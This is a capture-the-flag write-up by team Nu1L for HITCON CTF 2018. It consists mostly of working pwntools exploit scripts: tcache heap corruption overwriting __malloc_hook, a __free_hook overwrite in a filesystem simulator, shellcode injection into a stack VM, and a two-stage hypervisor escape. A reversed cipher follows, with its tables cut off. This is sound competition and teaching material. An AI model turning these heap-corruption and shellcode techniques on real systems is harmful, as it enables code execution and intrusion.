2018 HITCON CTF

By Nu1L

比赛网址:https://ctf2018.hitcon.org/
比赛时间:2018/10/20 02:00 UTC ~ 2018/10/22 02:00 UTC


PWN

children tcache

from pwn import *
#p=process('./child',env={'LD_PRELOAD':'./libc.so.6'})
# Parsed copy of the target libc (symbol lookup below) and the connection
# to the challenge service. The commented-out process() line above is the
# local-debug alternative that preloads the same libc.
libc = ELF('./libc.so.6')
p = remote('54.178.132.125', 8763)
def add(size, data):
    """Menu option 1: allocate `size` bytes and store `data` in the new slot.

    Each prompt is awaited before its answer is sent. `data` goes out raw
    (no newline appended), so callers terminate it themselves.
    """
    io = p
    io.recvuntil('choice')
    io.sendline('1')
    io.recvuntil('Size:')
    io.sendline('{}'.format(size))
    io.recvuntil('Data:')
    io.send(data)

def dele(index):
    """Menu option 3: free the chunk held in slot `index`."""
    dialogue = (
        ('choice', '3'),
        ('Index', '{}'.format(index)),
    )
    for expected, answer in dialogue:
        p.recvuntil(expected)
        p.sendline(answer)

# Exploit sequence driven through add()/dele(). The trailing "#N" comments
# are the slot numbers the binary assigns. The order of allocations and
# frees is what shapes the allocator state, so steps must not be reordered
# or merged. NOTE(review): the repeated 7-alloc/7-free rounds look like
# tcache-bin filling (the challenge name suggests so) -- confirm against
# the binary before reusing this anywhere else.
for i in range(7):
    add(0x80,'xxx\n')
for i in range(7):
    dele(i)

for i in range(7):
    add(0x110-8,'xxx\n')

add(0x110-8,'aaaa\n')#7
add(0x100,'bbbb\n')#8
add(0x100,'cccc\n')#9

for i in range(7):
    dele(i)

dele(8)
dele(7)

#raw_input()
for i in range(7):
    add(0x110-8,'aaaa\n') #0-6
# The only add() whose data fills the whole requested size with no newline.
add(0x110-8,'a'*(0x110-8))#7
for i in range(7):
    dele(i)
#raw_input()
for i in range(7):
    add(0x80,'1234567\n')#0-6

add(0x80,'xxxxxxxx\n')#8

for i in range(7):
    dele(i)

add(0x60,'ABCD\n')#0

dele(8)
dele(9)
add(0x40,'a\n')#1
add(0x30,'b\n')#2
add(0x500,'aaaa\n')#3
add(0x120,'bbbb\n')#4
# Author's note: slots 0 and 3 refer to the same (overlapping) chunk, so
# freeing 3 and then viewing 0 reads freed-chunk contents.
#0,3->same chunk
dele(3)
# Menu option 2 on slot 0 (inline, since there is no helper for it).
p.recvuntil('choice')
p.sendline('2')
p.recvuntil("Index:")
p.sendline('0')
# Six leaked bytes, zero-padded to a qword.
addr = u64(p.recv(6).ljust(8,'\x00'))
# Distance from the leaked pointer to the libc base, taken as the difference
# of two addresses observed in one debugging run. Only valid for the
# provided libc.so.6 build.
libc_base = addr - (0x00007f2e9c12dca0-0x7f2e9bd42000)
info("libc:0x%x",libc_base)
malloc_hook = libc_base+libc.symbols['__malloc_hook']
info("malloc hook:0x%x",malloc_hook)
# Hard-coded libc-relative offset for this libc build (name suggests a
# one-shot gadget; the page does not say how it was obtained).
one = libc_base + 0x10a38c
add(0x500,'aaaaa\n')#3
dele(3)
add(0x120,'ABCDABCD\n')
dele(4)
dele(3)
dele(0)
# Data written into a slot is an 8-byte pointer plus the newline terminator.
add(0x120,p64(malloc_hook)+'\n')

add(0x120,p64(one)+'\n')
add(0x120,p64(one)+'\n')

# Final menu option 1 with size 304; no prompts are awaited here, both
# lines are just pushed before handing the connection to the user.
p.sendline('1')
p.sendline('304')
p.interactive()

Groot

指针未初始化

#!/usr/bin/env python2
# coding:utf-8
from pwn import *
import os

VERBOSE = 1         # 1: set pwntools log level to DEBUG (see below)
DEBUG   = 1         # 1: when LOCAL, print a gdb attach command and wait
LOCAL   = 0         # 1: spawn ./groot locally; 0: connect to remote_addr:remote_port

target = 'groot'
libc   = []         # libc builds to LD_PRELOAD for a local run (empty: none)
break_points = []   # addresses for the gdb attach command (LOCAL + DEBUG only)
remote_addr = '54.238.202.201'
remote_port = 31733

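def hint(break_points=None):
    """Print a `gdb attach` command for the local target and wait for Enter.

    Does nothing unless LOCAL is set. `break_points` is an optional list of
    addresses; each becomes a `-ex 'b *ADDR'` argument and, when any are
    given, the command ends with `-ex 'c'`. The default is None instead of
    the original mutable `[]` so no list object is shared between calls.
    """
    if not LOCAL:
        return
    break_points = break_points or []
    out = 'gdb attach ' + str(pwnlib.util.proc.pidof(target)[0])
    for bp in break_points:
        out += " -ex 'b *{}'".format(hex(bp))
    raw_input(out + " -ex 'c'\n" if break_points else out + "\n")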
# if libc:
#     elf = ELF(libc[0])
#     gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))

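# Target setup: spawn the binary locally (optionally with the libc builds
# listed in `libc` preloaded and a gdb attach prompt when DEBUG is set), or
# connect to the remote instance.
if LOCAL:
    if libc:
        # One LD_PRELOAD value holding every listed build. The original
        # assigned inside the loop, so only the last entry survived.
        os.environ['LD_PRELOAD'] = ':'.join(
            os.environ['PWD'] + '/' + libc_ for libc_ in libc)
    p = process('./' + target)
    if DEBUG:
        # Same attach prompt as hint(); keep a single copy of that logic.
        hint(break_points)
else:
    p = remote(remote_addr, remote_port)

# pwntools log level. 'DEBUG' here is the pwntools level name and is
# unrelated to the DEBUG flag above.
if VERBOSE: context.log_level = 'DEBUG'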



def mkdir(dir):
    """Send `mkdir <dir>` at the target's next shell prompt."""
    line = 'mkdir ' + dir
    p.sendlineafter('$ ', line)

def touch(name):
    """Send `touch <name>` at the target's next shell prompt."""
    line = 'touch ' + name
    p.sendlineafter('$ ', line)

def rm(name):
    """Send `rm <name>` at the target's next shell prompt."""
    line = 'rm ' + name
    p.sendlineafter('$ ', line)

def mkfile(name, content):
    """Send `mkfile <name>` at the prompt, then answer the content question."""
    exchange = (
        ('$ ', 'mkfile ' + name),
        ('Content?', content),
    )
    for prompt, answer in exchange:
        p.sendlineafter(prompt, answer)

def cd(dir):
    """Send `cd <dir>` at the target's next shell prompt."""
    line = 'cd ' + dir
    p.sendlineafter('$ ', line)

def ls(dir):
    """Send `ls <dir>` at the next prompt, or a bare `ls` when `dir` is empty."""
    line = 'ls ' + dir if dir else 'ls'
    p.sendlineafter('$ ', line)

def mv(src, dst):
    """Send `mv <src> <dst>` at the target's next shell prompt."""
    line = ' '.join(('mv', src, dst))
    p.sendlineafter('$ ', line)

def exp(cmd=None):
    """Run the exploit against the connected target `p`, then go interactive.

    `cmd` is accepted for interface compatibility but never used. The
    sequence is order-sensitive (it shapes the challenge's directory tree
    and, through it, the heap), so steps must not be reordered. All
    decimal/hex offsets are tied to the remote binary and libc build.
    NOTE(review): the paths used below appear to be entries of the
    challenge's own directory model rather than the host file system --
    confirm against the binary.
    """

    mkdir('A'*0x30)
    cd('A'*0x30)
    touch('B'*0x30)
    cd('..')
    rm('A'*0x30)
    touch('X')
    touch('C'*0x30)
    rm('X')
    ls('')
    # Skip 0x14 bytes of listing output, then read a 6-byte pointer and
    # zero-pad it to a qword.
    p.recv(0x14)
    heap = u64(p.recv(6).ljust(8,'\x00'))
    print hex(heap)
    # Observed distance from the leak to the heap base (decimal literal
    # from a debugging run).
    heap_base = heap - 76864
    print hex(heap_base)

    # The raw 8-byte pointer is used as the entry name.
    rm(p64(heap))
    # raw_input()
    # Pointer truncated to 6 bytes (presumably to keep NUL bytes out of the
    # line; the target reads a newline-terminated command).
    ls(p64(heap_base+0x11fd0)[:-2])
    # raw_input()
    for i in range(4):
        ls('HEHE')
    # raw_input()
    # 8 filler bytes then 0x561 as a little-endian 16-bit value.
    # NOTE(review): 0x561 looks like a chunk size field -- confirm.
    ls('A'*8+p16(0x561))
    rm('/etc/passwd')
    ls('/')
    ls('/')
    ls('/')
    # Second leak: after the 'dev' entry, skip 0x10 bytes and read a 6-byte
    # pointer. This local `libc` shadows the module-level `libc` list.
    p.recvuntil('dev')
    p.recv(0x10)
    libc = u64(p.recv(6).ljust(8,'\x00'))
    print hex(libc)
    # Hard-coded libc-relative offset of the leaked pointer.
    libc_base = libc - 0x789ca0
    print hex(libc_base)

    # raw_input()
    for i in range(2):
        ls('D'*0x30)
    # raw_input()
    rm('/dev')

# add bin sh
    # ls('')
    mv('HEHE','sh')
    # mv('/bin/id','/bin/sh')
    # cd('../../../../../../../../../../../bin')

    for i in range(9):
        ls('D'*0x60)
    # ls('E'*0x40)
    # ls('E'*0x40)
    rm('/boot')

    ls('E'*0x40)

    # raw_input('hehehe')
    # libc-relative addresses for this build; `malloc_hook` is computed but
    # never used below.
    free_hook = 7911656 + libc_base
    malloc_hook = 0x789c30 + libc_base
    magic = 0x4f440 + libc_base + 3792896
    # 0x40 filler bytes followed by a heap pointer (8 bytes).
    ls('X'*0x40+p64(heap_base+0x50-0x28))
    ls('D'*0x30)
    # raw_input('sending free hook')
    # ls(p64(free_hook-0x28)[:-2])

    # raw_input()
    print hex(magic)
    print hex(free_hook)
    # 0x28 filler bytes followed by the free_hook address.
    rm('A'*0x28+p64(free_hook))


    # mkdir('../../../../../../../../../../../../../../bin/sh')
    # mv('/bin/id',p64(magic))
    # The magic address is sent as the entry name; then drain output for
    # one second before the final command.
    ls(p64(magic))
    p.recvrepeat(1)
    # raw_input()
    # Sent without waiting for a prompt: rm of a path eight levels up.
    p.sendline('rm ' + '../'*8+'home/groot/sh')
    # raw_input()
    # ls('123')



    # mkdir('ttt')
    # cd('ttt')

    # for i in range(10):
    #     mkdir(str(i)*0x30)
    # mkdir('C'*0x30)
    # cd('C'*0x30)
    # touch('A'*0x30)
    # cd('..')
    # rm('C'*0x30)


    # touch()


    p.interactive()


if __name__ == "__main__":
    # The argument is accepted by exp() but currently unused.
    exp(cmd="id")

Abyss I

是个堆栈机VM
swap 没有边界检查,可以越界到machine

把machine盖成负数,可以向上写got表
输入中放入shellcode,改shellcode跳过去即可

from pwn import *

p = remote('35.200.23.198', 31733)
# Assembly target for the asm()/shellcraft calls below.
context(arch = 'amd64', os = 'linux')
# pwntools setting; only meaningful for a locally spawned process().
context.aslr = False
#p = process('./user.elf')
#gdb.attach(p)

#p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
# Program text for the challenge's stack-machine VM (see the notes above:
# swap has no bounds check). Keep the string byte-exact.
payload = '4294967295\\'
# Python 2 integer division; under Python 3 this would be a float and
# `'%' * float` raises TypeError -- `//` is the portable form.
payload += '%' * ((0x2020a0 - 0x202030) / 4 - 2)
payload += '0:'
payload += '1:'
payload += '%%%%1;'
# Decimal operand computed from fixed binary offsets (tied to this build).
payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'

# payload += str(0x7BEC0 - 0x4f322) + '\x011'
# payload += ';-'
# payload += '0;'
# payload += '.'
payload += '0;'
payload += ','
# Pad the VM program to 0x100 bytes so the machine code that follows starts
# at a fixed offset in the input.
payload = payload.ljust(0x100, '\x01')
# open("flag"), read 0x100 bytes of it to the stack, write them to stdout.
# fd 3 assumes no other file is open in the process at that point.
payload += asm(shellcraft.amd64.linux.open('flag', 0, 0))
payload += asm(shellcraft.amd64.linux.read(3, 'rsp', 0x100))
payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x100))
p.sendline(payload)
p.interactive()

Abyss II

系统调用号对应的处理函数(大概)

(0, '0x239L') read
(1, '0xa9aL') write
(2, '0x972L') open
(3, '0xf4bL') 
(5, '0x1caL')
(9, '0xc47L')
(10, '0x17b2L')
(11, '0xd54L')
(12, '0xbc6L')
(20, '0xb0dL')
(21, '0xa4cL')
(60, '0x966L')
(158, '0xb87L')
(221, '0x195L')
(231, '0x966L')
(257, '0xa39L')

write_sys 应该可以溢出。。。。试一试
让buf的地址加上size溢出到一个很小的数应该就可以过那个检查
kmalloc很大的数的时候会返回0,看了一下hypervisor似乎image base也是0,大概可以覆盖代码

hypervisor还有个蜜汁验证

已经能成功执行shellcode了,还需要逆一下串口的交互,手写一下open,read和write

from pwn import *
import time
# Assembly target for every asm()/shellcraft call in this script.
context.update(arch='amd64', os='linux')
# pwntools option that only matters for a locally spawned process().
context.aslr = False



def runshellcode(p, s):
    """Send the first-stage input to `p`, then push `s` as the second stage.

    The VM program text and padding are the same as in the Abyss I script;
    the appended machine code writes a 4-byte marker, reads up to 0x1000
    bytes onto the stack and jumps there. After the marker arrives, `s` is
    sent raw. Side effect: the pwntools log level is set to 'debug' on
    return, for every later call on any tube.
    """
    payload = '4294967295\\'
    # Python 2 integer division; `//` would be the portable form.
    payload += '%' * ((0x2020a0 - 0x202030) / 4 - 2)
    payload += '0:'
    payload += '1:'
    payload += '%%%%1;'
    payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'
    payload += '0;'
    payload += ','
    # Pad the VM program so the machine code starts at offset 0x100.
    payload = payload.ljust(0x100, '\x01')
    # 0x61616161 == 'aaaa': the marker awaited below.
    payload += asm('push 0x61616161')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x4))
    payload += asm(shellcraft.amd64.linux.read(0, 'rsp', 0x1000))
    payload += asm('jmp rsp')
    p.sendline(payload)
    p.recvuntil('aaaa')
    p.send(s)
    context.log_level = 'debug'

def main():
    """Connect to the remote service and run both stages of the exploit.

    Stage 1 (delivered through runshellcode) maps a fixed rwx region,
    reads the stage-2 image into it and issues the oversized write
    described in the notes above. Stage 2 is a raw image whose machine code
    talks to ports 0x8000..0x8002. All sizes/offsets are tied to this
    challenge build.
    """
    p = remote('35.200.23.198', 31733)
    #p = process('./user.elf')
    #p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
    payload = ''

    # mmap(0x500000, 0x10000, prot=7 (rwx), flags=16 (MAP_FIXED), -1, 0);
    # the returned address is pushed and echoed back for inspection.
    mmap_addr = 0x500000
    payload += asm(shellcraft.amd64.linux.mmap(mmap_addr, 0x10000, 7, 16, -1, 0))
    payload += asm('push rax')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
    payload += asm(shellcraft.amd64.linux.read(0, mmap_addr, 0x10000))
    # Length is 2**64 - mmap_addr + 0x300000, i.e. a value that wraps so
    # buf + len is small (the write-handler check discussed in the notes).
    payload += asm(shellcraft.amd64.linux.write(1, mmap_addr, 0x10000000000000000 - mmap_addr + 0x300000))
    payload += asm('push rax')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
    runshellcode(p, payload)

    # Fixed delay before stage 2; nothing is synchronised on, so a slow
    # link makes this fragile.
    time.sleep(10)
    # Stage-2 image: an 8-byte name, two (fd?, 0x100, 0x100) qword triples
    # (NOTE(review): meaning inferred from the values only -- confirm),
    # NOP-padded (0x90) to 0xa5d + 36 bytes, then the port-I/O code.
    payload = 'flag2'.ljust(8, '\x00')
    payload += p64(3) + p64(0x100) + p64(0x100)
    payload += p64(1) + p64(0x100) + p64(0x100)
    payload = payload.ljust(0xa5d, '\x90') + '\x90'*36
    # Each block loads a port in dx and a value in eax; the raw bytes
    # 0xEF / 0xED that follow are `out dx, eax` / `in eax, dx`.
    payload += asm('''
    mov dx, 0x8000
    mov eax, 0x0
    ''')
    payload += '\xef\xed'
    payload += asm('''
    mov dx, 0x8001
    mov eax, 0x8
    ''')
    payload += '\xef\xed'
    payload += asm('''
    mov dx, 0x8002
    mov eax, 0x20
    ''')
    payload += '\xef\xed'
    # 0xEB 0xFE: `jmp $` (spin here).
    payload += '\xeb\xfe'
    # NOP-pad to 0xadb, then 0xEB 0x80: a short jump of -128 bytes.
    payload = payload.ljust(0xadb, '\x90')
    payload += '\xeb\x80'
    p.send(payload)
    p.interactive()    

if __name__ == "__main__":
    # Entry point: connect and run both exploit stages.
    main()

Super Hexagon | solved 1, stuck 2 | pzhxbz

第一层

scanf里面似乎有一个溢出,可以覆盖函数指针

Reverse

EOP

感觉是用c++的异常处理机制实现的一个像控制流平坦化的东西。。。。

使用gdb script进行跟踪

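# gdb trace script: break at the dispatch address and append $rax to
# ./log on every hit, giving the order in which handlers are called.
b *(0x8000000+0x5620)
python f = open('log','w')
run < test_input
# Loop flag. It is never cleared, so the loop only ends when the inferior
# exits and `continue` fails.
set $ipx=1
while ($ipx)
  python a = hex(gdb.parse_and_eval("$rax"))
  python f.write(a+'\n')
  python f.flush()
  continue
end
# Flush after every write (above) so the log is complete even if gdb is
# interrupted; the original never flushed or closed the file.
python f.close()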

可以拿到程序的调用函数顺序,大致分析之后发现程序大概为3个循环对用户输入进行加密

大致分析后可以发现中间很多代码都是一样的,猜测是一个循环被拆分出来的结果。

于是半猜半蒙的一步一步还原算法 orz

还原之后的算法如下:

from pwn import *

index_table1 = [1448535819,1128528919,3149608817L,134807173,3570665939L,3806473211L,2728570142L,1936927410,3014904308L,757936956,2358043856L,3082270210L,2374833497L,101119117,2324303965L,3166450293L,3334870987L,3486456007L,2593817918L,2863289243L,1296954911,3941258622L,1212708960,3772817536L,774785486,1061104932,3284375988L,336915093,4227576212L,1970658879,4210704413L,3907542533L,3469666638L,791656519,555856463,1600120839,1953771446,3318050105L,3739122733L,1246425883,3924406156L,3048553849L,2004309316,2981184143L,117900548,2913818271L,1347425158,1162152090,4075994776L,3452801980L,1802191188,3368558019L,2526413901L,1717973422,3099086211L,320073617,3267520573L,2459073467L,690572490,2947538404L,3200170254L,960092585,993743570,623234489,4042274275L,1330609508,707409464,4261233945L,2644344890L,3520169900L,3553823959L,2341200340L,3065399179L,33721211,1145370899,2678000449L,3789639945L,1094809452,1819034704,825304876,505323371,454758676,2560101957L,1549570805,589510964,3991785594L,370565614,4244419728L,2240146396L,3974898163L,2391699371L,724289457,1313770733,185304183,2543318468L,1482222851,842161630,1195869153,16904585,2930650221L,3840204662L,2122209864,2442199369L,4160172263L,2021174981,2577006540L,1835906521,2779097114L,2223250005L,3604382376L,4143366510L,1633760426,202146163,2071712823,875866451,1532729329,1280051094,3722249951L,0,421108335,2088554803,2475919922L,2896996118L,252705665,4126522268L,2139073473,1027450463,404253670,606354480,3132802808L,1229556201,2509602495L,1650609752,572704957,976921435,3031747824L,3537042782L,4025441025L,2408554018L,3755969956L,2745392279L,2273796263L,488498585,2610656439L,2307484335L,1515873912,3654908201L,2711738348L,286352618,522153698,4294954594L,2661219016L,1077970661,3705468758L,640071499,1431674361,1397975412,353704732,2812748641L,1566401404,3250655951L,2425417920L,3385453642L,1381144829,2694850149L,3435946549L,741130933,2172752938L,4278075371L,673758531,943204384,387420263,1499012234,67403766,3351766594L,3873854477L,269522275,3
823360626L,1987486925,1010587606,3115957258L,1886408768,3671720923L,2155898275L,168457726,1044307117,2627498419L,3958056183L,3638069408L,909517352,84250239,1785376989,1179021928,808507045,1263207058,1667481553,3688624722L,2256965934L,859024471,437969053,3233866566L,1903272393,1414818928,1852755755,4177054566L,656885442,2290653990L,2189618904L,2492763958L,1616954659,3587569754L,3503322661L,1465325186,538985414,3890718084L,2964370182L,1111625118,2037997388,2105352378,2829637856L,3301219504L,2762234259L,1734852647,235801096,2880152082L,1920129851,3183330300L,3402274488L,218984698,4193860335L,1364320783,4059153514L,1768540719,4109650453L,892688602,471602192,4008618632L,926405537,2054825406,50559730,3621221153L,1701137244,151588620,3857002239L,3419105073L,1751661478,1684323029,2998024317L,4092808977L,3216984199L,2206408529L,303177240,2795950824L,1583225230,2846435689L,1869561506]
index_table2 = [67438343,1346661484,3474112961L,1136470056,1858205430,1427801220,1604730173,4240686525L,3371867806L,1618495560,1593692882,628543696,132669279,2381579782L,895667404,561240023,3190127226L,4173773498L,2808121223L,3460902446L,3932426513L,1548445029,714375553,4106859443L,247054014,2317113689L,1819754817,943073834,3236991120L,4213957346L,3865778200L,2472125604L,1764338089,2648709658L,847942547,269753372,1413573483,1937837068,2714974007L,3985395278L,2005142283,2140013829,2180714255L,2086886749,3607942099L,3730649650L,1292146326,357233908,1805590046,2673257901L,3273509064L,2629563893L,2269691839L,1537423930,1158584472,1009986861,2202908856L,1030275778,2539430819L,2788911208L,3407333062L,2292903662L,3906119334L,156361185,3772295336L,2693322968L,2894582225L,4135519236L,4281263589L,1791291889,1966259388,424017405,3259377447L,3596041276L,2249412688L,3571551115L,1281325433,2494692347L,3450107510L,1337073953,3663213877L,1872369945,2100867762,606945087,2581929245L,3439303065L,2651669058L,134876686,2182502231L,2448364307L,2427780348L,1685933903,3973554593L,180140473,0,828885963,3518980963L,471536917,335103044,3096890058L,3316545656L,2722000751L,1926947811,1886147668,580816783,1091280799,3528604475L,536235341,1470903091,3674462938L,1403597876,2336732854L,1657733119,112439472,468929098,2517060684L,4201647373L,447260069,1629726631,1831644846,1203253039,3145437842L,2989126515L,2963064004L,1048943258,1361019779,3850780736L,4039947444L,2515145748L,3719326314L,1994384612,2942994825L,2922473062L,4269083146L,1189331136,3504639116L,1481532002,600137824,915379348,1724643576,673330742,1004237426,3918088521L,1494584717,3249241983L,2034087349,1737496343,2827146966L,981507485,4254618194L,4120009820L,3304429463L,2876214926L,2060512749,3382800753L,2449623883L,2605951658L,2360338921L,2127948522,199710294,2849585465L,3741769181L,1670713360,3029976003L,1071543669,4013619705L,1561365130,647727240,3878746103L,2855559521L,735014510,1146451831,1270294054,2072707586,45529015,1213890174,8092
47780,336665371,2760761311L,2741338240L,3839733679L,514695842,781289094,402408259,1224839569,3163803085L,1899477947,1752319558,2982619947L,2158026976L,202311945,380087468,2314273025L,1697030304,3706422661L,2916892222L,65886296,3117229349L,2562650866L,2403512753L,312650667,1391647707,3077872539L,876159779,4053228379L,3049401388L,1323945678,1526257109,539506744,801794409,2782277680L,1122420679,740766001,666920807,22802415,90106088,869366908,3326287904L,3393988905L,1079013488,290452467,3946839806L,4187837781L,2225465319L,3999340054L,1459084508,3783477063L,3212744085L,2248017928L,3340292047L,4068082435L,3585762404L,3811963120L,763158238,404623890,1953059667,1257032137,3639509634L,2384027230L,3122691453L,695851481,2584233285L,963495365,3652545901L,490797818,3056563316L,936672123,2019973722,3798867743L,4079086828L,4146392043L,3184009762L,3010567324L,3540636884L,266490193,223667942]
index_table3 = [3188637369L,582820552,701114700,4220844977L,1243302643,2083749073,4237360308L,274927765,1468159766,1029651878,1293897206,3161832498L,1722705457,1730635712,1125598204,1117667853,3815957466L,1443583719,2167046548L,3554136844L,354161947,1167738120,92210574,1059340077,2663948026L,4009881435L,446503648,2026207406,1941074730,3213344584L,3251618066L,1097613687,1586388505,607134780,3104487868L,3832997087L,83231871,2953228467L,1872916286,1612931269,1331974013,3884246949L,2345962465L,2469565322L,675489981,3492139126L,3095640141L,1442403741,3062609479L,3368273949L,3570652169L,733031367,192351108,1568431459,3377121772L,1542544279,510336671,2284226715L,3892701278L,3426077794L,1883271248,3517763975L,2554697742L,3136862918L,2546243573L,1649959502,1909027233,66192250,1674666943,4246338885L,2109373728,2309982570L,4159174448L,3044652349L,2275903328L,2671877899L,1003633490,1088766086,933312467,3918326191L,3308897645L,384702049,3601389186L,2716639703L,750070978,4120704443L,1792895664,1800694593

       
       
       

    
